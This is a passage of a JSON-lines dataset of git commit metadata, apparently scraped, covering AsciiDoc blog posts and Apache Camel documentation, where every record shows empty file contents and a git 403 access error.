Gitbook\n","repos":"RohanHart\/camel,gnodet\/camel,bgaudaen\/camel,neoramon\/camel,ullgren\/camel,akhettar\/camel,bgaudaen\/camel,NickCis\/camel,w4tson\/camel,chirino\/camel,chirino\/camel,NickCis\/camel,pkletsko\/camel,dmvolod\/camel,nicolaferraro\/camel,dmvolod\/camel,zregvart\/camel,ssharma\/camel,curso007\/camel,sabre1041\/camel,JYBESSON\/camel,snurmine\/camel,CodeSmell\/camel,JYBESSON\/camel,scranton\/camel,cunningt\/camel,tlehoux\/camel,dmvolod\/camel,tkopczynski\/camel,pmoerenhout\/camel,nicolaferraro\/camel,gnodet\/camel,snurmine\/camel,objectiser\/camel,jkorab\/camel,nboukhed\/camel,scranton\/camel,sirlatrom\/camel,yuruki\/camel,sverkera\/camel,sirlatrom\/camel,dmvolod\/camel,Fabryprog\/camel,lburgazzoli\/camel,DariusX\/camel,tkopczynski\/camel,tadayosi\/camel,Fabryprog\/camel,sabre1041\/camel,scranton\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,jonmcewen\/camel,tkopczynski\/camel,driseley\/camel,hqstevenson\/camel,tadayosi\/camel,Thopap\/camel,onders86\/camel,veithen\/camel,neoramon\/camel,sverkera\/camel,driseley\/camel,snurmine\/camel,Thopap\/camel,sverkera\/camel,mcollovati\/camel,mcollovati\/camel,rmarting\/camel,acartapanis\/camel,ssharma\/camel,hqstevenson\/camel,jamesnetherton\/camel,ullgren\/camel,scranton\/camel,veithen\/camel,punkhorn\/camel-upstream,lburgazzoli\/apache-camel,hqstevenson\/camel,DariusX\/camel,christophd\/camel,prashant2402\/camel,bhaveshdt\/camel,tdiesler\/camel,lburgazzoli\/camel,alvinkwekel\/camel,kevinearls\/camel,davidkarlsen\/camel,acartapanis\/camel,RohanHart\/camel,RohanHart\/camel,lburgazzoli\/camel,jkorab\/camel,pmoerenhout\/camel,allancth\/camel,ssharma\/camel,alvinkwekel\/camel,yuruki\/camel,tlehoux\/camel,dmvolod\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,mgyongyosi\/camel,isavin\/camel,sverkera\/camel,adessaigne\/camel,mcollovati\/camel,gautric\/camel,NickCis\/camel,curso007\/camel,gautric\/camel,mgyongyosi\/camel,allancth\/camel,kevinearls\/camel,bgaudaen\/camel,anoordover\/camel,christophd\/camel,snurmine\/camel,cunningt\/camel,jamesnetherton\/camel,allancth\/camel,prashant2402\/camel,acartapanis\/camel,christophd\/camel,NickCis\/camel,ssharma\/camel,chirino\/camel,curso007\/camel,mgyongyosi\/camel,anton-k11\/camel,Thopap\/camel,yuruki\/camel,nboukhed\/camel,sabre1041\/camel,jarst\/camel,zregvart\/camel,nboukhed\/camel,anoordover\/camel,prashant2402\/camel,yuruki\/camel,akhettar\/camel,gilfernandes\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,NickCis\/camel,isavin\/camel,anoordover\/camel,pkletsko\/camel
,gautric\/camel,rmarting\/camel,jarst\/camel,apache\/camel,pax95\/camel,ullgren\/camel,chirino\/camel,pkletsko\/camel,veithen\/camel,sirlatrom\/camel,bgaudaen\/camel,kevinearls\/camel,gilfernandes\/camel,isavin\/camel,drsquidop\/camel,sabre1041\/camel,alvinkwekel\/camel,jkorab\/camel,tadayosi\/camel,bgaudaen\/camel,pax95\/camel,jkorab\/camel,lburgazzoli\/apache-camel,isavin\/camel,driseley\/camel,pmoerenhout\/camel,w4tson\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,pmoerenhout\/camel,apache\/camel,Thopap\/camel,bgaudaen\/camel,ssharma\/camel,allancth\/camel,gnodet\/camel,curso007\/camel,anton-k11\/camel,isavin\/camel,JYBESSON\/camel,acartapanis\/camel,tdiesler\/camel,akhettar\/camel,pkletsko\/camel,tlehoux\/camel,driseley\/camel,cunningt\/camel,veithen\/camel,onders86\/camel,jonmcewen\/camel,kevinearls\/camel,apache\/camel,lburgazzoli\/camel,bhaveshdt\/camel,alvinkwekel\/camel,neoramon\/camel,objectiser\/camel,gautric\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,apache\/camel,drsquidop\/camel,apache\/camel,tdiesler\/camel,jonmcewen\/camel,acartapanis\/camel,gilfernandes\/camel,kevinearls\/camel,prashant2402\/camel,sverkera\/camel,bhaveshdt\/camel,rmarting\/camel,yuruki\/camel,onders86\/camel,CodeSmell\/camel,tlehoux\/camel,salikjan\/camel,pax95\/camel,w4tson\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,drsquidop\/camel,anton-k11\/camel,ssharma\/camel,mcollovati\/camel,curso007\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,anoordover\/camel,snurmine\/camel,drsquidop\/camel,punkhorn\/camel-upstream,sirlatrom\/camel,rmarting\/camel,tlehoux\/camel,Thopap\/camel,rmarting\/camel,zregvart\/camel,veithen\/camel,JYBESSON\/camel,sirlatrom\/camel,scranton\/camel,cunningt\/camel,apache\/camel,jarst\/camel,drsquidop\/camel,lburgazzoli\/camel,jamesnetherton\/camel,hqstevenson\/camel,Fabryprog\/camel,akhettar\/camel,nboukhed\/camel,sabre1041\/camel,JYBESSON\/camel,neoramon\/camel,isavin\/camel,prashant2402\/camel,gilfernandes\/camel,nikhilvibhav\/camel,anoordover\/camel,acartapanis\/camel,sirlatrom\/camel,nikhilvibhav\/camel,hqstevenson\/camel,jamesnetherton\/camel,tkopczynski\/camel,jamesnetherton\/camel,w4tson\/camel,jkorab\/camel,chirino\/camel,mgyongyosi\/camel,nboukhed\/camel,jonmcewen\/camel,neoramon\/camel,gnodet\/camel,mgyongyosi\/camel,DariusX\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,CodeSmell\/camel,tdiesler\/camel,neoramon\/camel,akhettar\/camel,DariusX\/camel,gautric\/camel,anton-k11\/camel,nikhilvibhav\/camel,gilfernandes\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,jamesnetherton\/camel,anton-k11\/camel,w4tson\/camel,objectiser\/camel,allancth\/camel,jarst\/camel,prashant2402\/camel,pax95\/camel,sverkera\/camel,jarst\/camel,nicolaferraro\/camel,RohanHart\/camel,cunningt\/camel,gnodet\/camel,davidkarlsen\/camel,allancth\/camel,ullgren\/camel,salikjan\/camel,yuruki\/camel,nboukhed\/camel,onders86\/camel,drsquidop\/camel,anton-k11\/camel,jonmcewen\/camel,christophd\/camel,zregvart\/camel,chirino\/camel,tkopczynski\/camel,pax95\/camel,tkopczynski\/camel,pkletsko\/camel,tdiesler\/camel,davidkarlsen\/camel,pkletsko\/camel,onders86\/camel,jarst\/camel,nikhilvibhav\/camel,RohanHart\/camel,w4tson\/camel,veithen\/camel,akhettar\/camel,scranton\/camel,jkorab\/camel,rmarting\/camel,JYBESSON\/camel,driseley\/camel,adessaigne\/camel,curso007\/camel,snurmine\/camel,bhaveshdt\/camel,driseley\/camel,bhaveshdt\/camel,christophd\/camel,mgyongyosi\/camel,gautric\/camel,objectiser\/camel,tadayosi\/camel,onders86\/camel,dmvolod\/camel,sabre1041\/camel,hqstevenson\/c
amel,jonmcewen\/camel,christophd\/camel,tlehoux\/camel,gilfernandes\/camel,tadayosi\/camel,lburgazzoli\/camel,adessaigne\/camel,NickCis\/camel,anoordover\/camel,Thopap\/camel,RohanHart\/camel","old_file":"camel-core\/src\/main\/docs\/string-dataformat.adoc","new_file":"camel-core\/src\/main\/docs\/string-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"957f4bafc082942b168bf428751d010beeb27f18","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af92e9a4ce3db38a55ffd6b63b23b2cc19e2e69c","subject":"y2b create post Nissan GTR 2012 Joyride (Nissan GTR Review)","message":"y2b create post Nissan GTR 2012 Joyride (Nissan GTR Review)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-02-Nissan-GTR-2012-Joyride-Nissan-GTR-Review.adoc","new_file":"_posts\/2012-05-02-Nissan-GTR-2012-Joyride-Nissan-GTR-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bcff7419e1814b9136acf403767a302b6ce85c2","subject":"Update 2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","message":"Update 2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","repos":"kim0\/hubpress.io,kim0\/hubpress.io,kim0\/hubpress.io","old_file":"_posts\/2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","new_file":"_posts\/2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kim0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b09cb06ee15d6c389872b62a648def35887da245","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a59ded95c8e32ac927fb51b20e3d2ac69bf6e36","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 
2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28fd23c10706fdcee900ebcd77a2d994abccfb27","subject":"Fix layout","message":"Fix layout\n","repos":"zsoltii\/dss,openlimit-signcubes\/dss,alisdev\/dss,esig\/dss,zsoltii\/dss,esig\/dss,openlimit-signcubes\/dss,alisdev\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alisdev\/dss.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"96f7c30b42fb70194f2253505659d86e4107e2fb","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bd330387cd54116ccf0dfb11906873fc89bb0bb","subject":"Update 2015-07-18-How-do-you-say-it.adoc","message":"Update 2015-07-18-How-do-you-say-it.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-18-How-do-you-say-it.adoc","new_file":"_posts\/2015-07-18-How-do-you-say-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47875e702f8465df1dd22cd0881ad1055a07762d","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47c7da439848476d3b33864b82852c9d52be4634","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 
2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eab95670533d46d05a0ae90ea8827bdd44b4e938","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f67d6a1cdde3769dfa5c9cc7f4116c83a1545b91","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a92879e77fa135d5d283badf6eb13ff05ab67fb2","subject":"unix slash","message":"unix slash\n","repos":"lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3f7a635545ba1b092c7639be6033a0845d144019","subject":"Update 2015-06-11-Fireworks.adoc","message":"Update 
2015-06-11-Fireworks.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-Fireworks.adoc","new_file":"_posts\/2015-06-11-Fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad142868ee0786184dfb8884af16ec8e137d4b5b","subject":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","message":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb7331030b7b5a7847f4b22462263717b4f8a3f9","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c602a314400b839c41b2e0bcd6d4663f69453cf","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b8437b7b786634f80ca8b065ef7594daa450d9","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a2f23d1f82cc70977ff7424e23eb8ca6971af9b","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664f02e1bc956628acd7022e6e73aa58ad3e5ae5","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bb07f3335b2b19fd70fbc218613c4e842218ad6","subject":"Update 2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","message":"Update 2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","new_file":"_posts\/2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed29740ddd56f0ff370c9aa8b20fcd1d2dcb08d","subject":"y2b create post 64 chances to win a new TV!?!","message":"y2b create post 64 chances to win a new TV!?!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-18-64-chances-to-win-a-new-TV.adoc","new_file":"_posts\/2013-03-18-64-chances-to-win-a-new-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c5c4fd594421e777c73f30851dfcc76f8d78773","subject":"Update 2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","message":"Update 2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","new_file":"_posts\/2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd2282dbac6b93a1ebe232824cdabe8fe14c8b59","subject":"y2b create post Apple AirPods - Does It Suck?","message":"y2b create post Apple AirPods - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-11-Apple-AirPods--Does-It-Suck.adoc","new_file":"_posts\/2017-01-11-Apple-AirPods--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3fd93d5af75e85a0be60e4b24ea1d42d09596857","subject":"Update 2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","message":"Update 2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","new_file":"_posts\/2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c66e1ffae9b706fb991bb62e8033a44f68d1f199","subject":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","message":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12371fae47d26502f3dd5ad0bd809c5eab99f185","subject":"Update 2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","message":"Update 2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","new_file":"_posts\/2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"683228aaa49fd61909ecd6ae8e4b44586f4f59b5","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5602681cd996f399df3fb478f6a224ce8f179fa","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"039155065dc0996a73af21d0d8af02fc286b0d1e","subject":"Update 
2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","message":"Update 2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","new_file":"_posts\/2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"450c5d7cdf8db631a7d434d169b21c26c5ddc9e2","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebcddbbe748b953c8afdb6c25423b08ae6ff162f","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 